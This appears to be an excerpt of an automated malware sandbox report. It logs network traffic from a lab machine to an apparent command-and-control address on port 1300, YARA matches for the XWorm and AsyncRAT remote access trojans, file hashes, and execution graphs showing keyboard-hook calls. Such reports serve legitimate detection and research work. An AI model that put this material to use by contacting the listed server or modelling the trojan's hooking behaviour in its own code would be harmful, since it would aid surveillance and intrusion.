Jan 8, 2025 16:03:18.750360012 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:18.755283117 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:30.040585995 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:30.045521975 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:30.215641022 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:30.260557890 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:30.297465086 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:30.302325964 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.070091963 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.074985981 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.085886955 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.090672016 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.117001057 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.121824026 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.132571936 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.138185978 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.244626999 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.246525049 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.251287937 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.333076000 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.334682941 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.339468002 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.438905001 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.441862106 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.446629047 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:31.446747065 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:31.451505899 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:42.679574966 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:42.684519053 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:42.863753080 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:42.865669966 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:42.870491982 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:43.710777998 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:43.715778112 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:43.908474922 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:43.910629988 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:43.915446043 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:46.241774082 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:46.289113045 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:51.507738113 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:51.512636900 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:51.523344040 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:51.528424978 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:51.681588888 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:51.683612108 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:51.688714981 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:51.770205975 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:03:51.771931887 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:03:51.776731014 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:01.835839033 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:01.840734959 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:01.945261955 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:01.950170994 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:02.015912056 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:02.018831015 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:02.023642063 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:02.119378090 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:02.121337891 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:02.126205921 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:12.007824898 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:12.013093948 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:12.201752901 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:12.204104900 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:12.208937883 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:16.264450073 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:16.320012093 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:16.696623087 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:16.701569080 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:16.870901108 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:16.881663084 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:16.886512995 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:17.196518898 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:17.201476097 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:17.371294975 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:17.389755964 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:17.394665003 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:18.508152962 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:18.513098955 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:18.689404964 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:18.696855068 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:18.703135014 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.398538113 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.403439999 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.445456028 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.450447083 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.492145061 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.497059107 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.523439884 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.528337955 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.603184938 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.613852024 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.618801117 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.707431078 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.718825102 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.723745108 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.812462091 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.820238113 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.825344086 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.914037943 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:22.921977043 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:22.926817894 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:25.554632902 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:25.559587002 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:25.762893915 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:25.764834881 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:25.769692898 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:37.102691889 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:37.107578039 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:37.416768074 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:37.430720091 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:37.435611963 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:38.399048090 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:38.407035112 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:38.583436012 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:38.585572004 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:38.590341091 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:39.664130926 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:39.669044018 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:40.068279028 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:40.070225000 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:40.075052977 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:46.615189075 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:46.664670944 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:48.461266994 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:48.466159105 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:48.523505926 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:48.528348923 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:48.636507034 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:48.639684916 CET | 49757 | 1300 | 192.168.2.9 | 87.120.116.179
Jan 8, 2025 16:04:48.644618988 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
Jan 8, 2025 16:04:48.735920906 CET | 1300 | 49757 | 87.120.116.179 | 192.168.2.9
                            Jan 8, 2025 16:04:48.744672060 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:48.749597073 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.132925034 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:50.137973070 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.307584047 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:50.309401989 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:50.314346075 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.664164066 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.669142008 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.679759979 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.684643030 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.695352077 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.700259924 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.711024046 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.715914965 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.742296934 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.747287035 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.757998943 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.762934923 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.838493109 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.841620922 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.846481085 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.867280006 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.872153044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.898650885 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.903497934 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.914185047 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.919003963 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.935123920 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:53.941337109 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:53.987670898 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.008621931 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.010341883 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.015763044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.015815973 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.020593882 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.104399920 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.106204033 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.111022949 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.199621916 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.201683998 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.206950903 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.207000971 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.212394953 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.295618057 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:54.299412966 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:54.304306030 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:04:59.898597002 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:04:59.903614044 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:05:00.072731018 CET13004975787.120.116.179192.168.2.9
                            Jan 8, 2025 16:05:00.073652983 CET497571300192.168.2.987.120.116.179
                            Jan 8, 2025 16:05:00.078478098 CET13004975787.120.116.179192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:01:11.763698101 CET | 53 | 58708 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 16:00:52.055701017 CET | 1.1.1.1 | 192.168.2.9 | 0x165a | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 16:00:52.055701017 CET | 1.1.1.1 | 192.168.2.9 | 0x165a | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 16:00:52.055701017 CET | 1.1.1.1 | 192.168.2.9 | 0x165a | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | - | 13.107.253.45 | A (IP address) | IN (0x0001) | false

Target ID: 0
Start time: 10:00:52
Start date: 08/01/2025
Path: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe"
Imagebase: 0x3d0000
File size: 36'864 bytes
MD5 hash: 5AB0DB61A062D4AC36716B51C5DDAC3A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

                              Execution Graph

Execution Coverage: 18.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0

Execution graph (node: address, successor):
• 4727: 7ff887d31592 → 4728
• 4728: 7ff887d31c10, calls SetWindowsHookExW → 4730
• 4730: 7ff887d31cc1

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID: 0-3916222277
                              • Opcode ID: 3f71ae5e58a89971e612dcb1a02211d5c70652a0fa35b0ebaaa7dceb980adaf8
                              • Instruction ID: d829f0b8c6b355c69f931bfaafdb7bf5354170167e31869c5ba17ffc6807470f
                              • Opcode Fuzzy Hash: 3f71ae5e58a89971e612dcb1a02211d5c70652a0fa35b0ebaaa7dceb980adaf8
                              • Instruction Fuzzy Hash: F9725E30F5891A4BFB94EB78849567DB2E2FF98380B504679D45FD32C6EE2CE8428741
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9524b388ba05185975f3474c97a1be398ae0d95710e3f58e1429c63d5948224d
                              • Instruction ID: 9026178bf3b4724483ae8b4e814b683459b4022ecbff6028ed4c4cb61f6ce7f8
                              • Opcode Fuzzy Hash: 9524b388ba05185975f3474c97a1be398ae0d95710e3f58e1429c63d5948224d
                              • Instruction Fuzzy Hash: 73F1B730508A8E8FEBA8DF28C8557E977E1FF55340F04426EE85EC7295DB389945CB82
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65a4f5dbd3bbff538431435abb20a28666b7387f62d65d6c6c5fafeef35b0bff
                              • Instruction ID: ae442351349b44d93e93139596f56c05dbf5d4cf7f005ad62d374ed66e88ca84
                              • Opcode Fuzzy Hash: 65a4f5dbd3bbff538431435abb20a28666b7387f62d65d6c6c5fafeef35b0bff
                              • Instruction Fuzzy Hash: 4AE1A230908A8E8FEBA8DF28C8557E937E1FF54355F04436ED84EC7295DA789841CB82

                              Control-flow Graph

Control-flow graph (node: basic block address range, successors):
• 647: 7ff887d31be8-7ff887d31bef → 648, 649
• 648: 7ff887d31bfa-7ff887d31c6d → 653, 654
• 649: 7ff887d31bf1-7ff887d31bf9 → 648
• 653: 7ff887d31cf9-7ff887d31cfd → 655
• 654: 7ff887d31c73-7ff887d31c78 → 656
• 655: 7ff887d31c82-7ff887d31cbf, calls SetWindowsHookExW → 657, 658
• 656: 7ff887d31c7f-7ff887d31c80 → 655
• 657: 7ff887d31cc1 → 658
• 658: 7ff887d31cc7-7ff887d31cf8
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: cdc5028db1f3fa523ae20b04a11227c0028f4ca21ec65d57df31d9d2c12f1884
                              • Instruction ID: 4c51ec24a3293da1821cb523f1c9c53b048379d865adcc9ad2b16186132b1f69
                              • Opcode Fuzzy Hash: cdc5028db1f3fa523ae20b04a11227c0028f4ca21ec65d57df31d9d2c12f1884
                              • Instruction Fuzzy Hash: BA31E831A1CA4D4FDB08EB6CD8066F9BBE1FB55311F00427ED049D3192DE65A852C791

                              Control-flow Graph

Control-flow graph (node: basic block address range, successors):
• 661: 7ff887d31592-7ff887d31c6d → 665, 666
• 665: 7ff887d31cf9-7ff887d31cfd → 667
• 666: 7ff887d31c73-7ff887d31c78 → 668
• 667: 7ff887d31c82-7ff887d31cbf, calls SetWindowsHookExW → 669, 670
• 668: 7ff887d31c7f-7ff887d31c80 → 667
• 669: 7ff887d31cc1 → 670
• 670: 7ff887d31cc7-7ff887d31cf8
                              Memory Dump Source
                              • Source File: 00000000.00000002.3785254438.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff887d30000_17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea.jbxd
                              Similarity
                              • API ID: HookWindows
                              • String ID:
                              • API String ID: 2559412058-0
                              • Opcode ID: de2868e3520a159ddffba0b16eceb450802f4a0bcef543e7c5507ef4b7b82843
                              • Instruction ID: 0ae2c09916d4a7079c522e3d0ac8f94dc2ab6041897daf4840f31cf9c430c4ad
                              • Opcode Fuzzy Hash: de2868e3520a159ddffba0b16eceb450802f4a0bcef543e7c5507ef4b7b82843
                              • Instruction Fuzzy Hash: 7B31B430A1CA1D8FEB58EB5CD84A6FDB7E1EB59311F10423ED00ED3251DA65A852C7C1